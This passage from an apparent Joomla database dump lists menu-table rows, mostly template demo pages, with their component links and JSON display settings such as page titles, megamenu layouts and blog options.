00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',89,90,0,'*',0),(404,'mainmenu','Edit User Profile','edit-user-profile','','joomla/users-component/edit-user-profile','index.php?option=com_users&view=profile&layout=edit','component',-2,271,3,25,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',91,92,0,'*',0),(405,'mainmenu','Registration Form','registration-form','','joomla/users-component/registration-form','index.php?option=com_users&view=registration','component',-2,271,3,25,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',93,94,0,'*',0),(437,'mainmenu','Home','home','','home','index.php?option=com_sppagebuilder&view=page&id=1','component',-2,1,1,10047,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',25,28,0,'*',0),(449,'usermenu','Submit an Article','submit-an-article','','submit-an-article','index.php?option=com_content&view=form&layout=edit','component',1,1,1,22,0,'0000-00-00 00:00:00',0,3,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',141,142,0,'*',0),(450,'usermenu','Submit a Web Link','submit-a-web-link','','submit-a-web-link','index.php?option=com_weblinks&view=form&layout=edit','component',1,1,1,21,0,'0000-00-00 00:00:00',0,3,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',143,144,0,'*',0),(452,'mainmenu','Featured Contacts','featured-contacts','','joomla/contact-component/featured-contacts','index.php?option=com_contact&view=featured&id=16','component',-2,270,3,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_position_headings\":\"\",\"show_email_headings\":\"\",\"show_telephone_headings\":\"\",\"show_mobile_headings\":\"\",\"show_fax_headings\":\"\",\"show_suburb_headings\":\"\",\"show_state_headings\":\"\",\"show_country_headings\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"presentation_style\":\"sliders\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"1\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":1,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',83,84,0,'*',0),(466,'mainmenu','Smart Search','smart-search','','joomla/other-components/smart-search','index.php?option=com_finder&view=search','component',-2,268,3,27,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_date_filters\":\"\",\"show_advanced\":\"\",\"expand_advanced\":\"\",\"show_description\":\"\",\"description_length\":255,\"show_url\":\"\",\"show_pagination_limit\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"allow_empty_query\":\"0\",\"show_suggested_query\":\"1\",\"show_explained_query\":\"1\",\"sort_order\":\"\",\"sort_direction\":\"\",\"show_feed\":\"0\",\"show_feed_text\":\"0\",\"show_feed_link\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',107,108,0,'*',0),(471,'menu','com_tags','com-tags','','com-tags','index.php?option=com_tags','component',0,1,1,29,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'',145,146,0,'',1),(472,'main','com_postinstall','Post-installation messages','','Post-installation messages','index.php?option=com_postinstall','component',0,1,1,32,0,'0000-00-00 00:00:00',0,1,'class:postinstall',0,'',147,148,0,'*',1),(475,'partners','JoomShaper','joomshaper','','joomshaper','http://www.joomshaper.com/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',149,150,0,'*',0),(476,'partners','Themeum','themeum','','themeum','http://www.themeum.com/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',151,152,0,'*',0),(477,'partners','ShapeBootstrap','shapebootstrap','','shapebootstrap','http://shapebootstrap.net/','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',153,154,0,'*',0),(479,'partners','Page Builder','page-builder','','page-builder','http://www.joomshaper.com/page-builder','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',155,156,0,'*',0),(481,'saleslogic','Baselogic','baselogic','','baselogic','index.php?option=com_content&view=article&id=79','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\" \",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"481\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',157,158,0,'*',0),(482,'saleslogic','Clientlogic','clientlogic','','clientlogic','index.php?option=com_content&view=article&id=80','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"482\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',159,160,0,'*',0),(483,'saleslogic','Quotelogic','quotelogic','','quotelogic','index.php?option=com_content&view=article&id=81','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"483\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',161,162,0,'*',0),(484,'saleslogic','Replogic','replogic','','replogic','index.php?option=com_content&view=article&id=82','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"484\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',163,164,0,'*',0),(487,'mainmenu','Coming Soon','2015-02-02-15-01-12','','pages/2015-02-02-15-01-12','?tmpl=comingsoon','url',-2,279,2,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"487\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',30,31,0,'*',0),(488,'mainmenu','404 Page','2015-02-02-15-05-34','','pages/2015-02-02-15-05-34','index.php?option=com_404','url',-2,279,2,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',32,33,0,'*',0),(489,'mainmenu','Portfolio','portfolio','','home/portfolio','index.php?option=com_sppagebuilder&view=page&id=6','component',-2,437,2,10047,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',26,27,0,'*',0),(490,'mainmenu','Home','home-page','','home-page','index.php?option=com_sppagebuilder&view=page&id=2','component',1,1,1,10047,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"490\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',11,12,1,'*',0),(492,'mainmenu','Blog With Right Sidebar','blog-with-right-sidebar','','blog/blog-with-right-sidebar','index.php?option=com_content&view=category&layout=blog&id=79','component',-2,278,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',38,39,0,'*',0),(493,'mainmenu','Blog With Left Sidebar','blog-with-left-sidebar','','blog/blog-with-left-sidebar','index.php?option=com_content&view=category&layout=blog&id=79','component',-2,278,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',40,41,0,'*',0),(494,'mainmenu','Standard Post Format','standard-post-format','','post-formats/standard-post-format','index.php?option=com_content&view=article&id=73','component',-2,503,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',46,47,0,'*',0),(495,'mainmenu','Video Post Format','video-post-format','','post-formats/video-post-format','index.php?option=com_content&view=article&id=72','component',-2,503,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',48,49,0,'*',0),(496,'mainmenu','Gallery Post Format','gallery-post-format','','post-formats/gallery-post-format','index.php?option=com_content&view=article&id=74','component',-2,503,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',52,53,0,'*',0),(497,'mainmenu','Audio Post Format','audio-post-format','','post-formats/audio-post-format','index.php?option=com_content&view=article&id=75','component',-2,503,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',50,51,0,'*',0),(498,'mainmenu','Image Post Format','image-post-format','','post-formats/image-post-format','index.php?option=com_content&view=article&id=73','component',-2,503,2,22,0,'0000-00-00 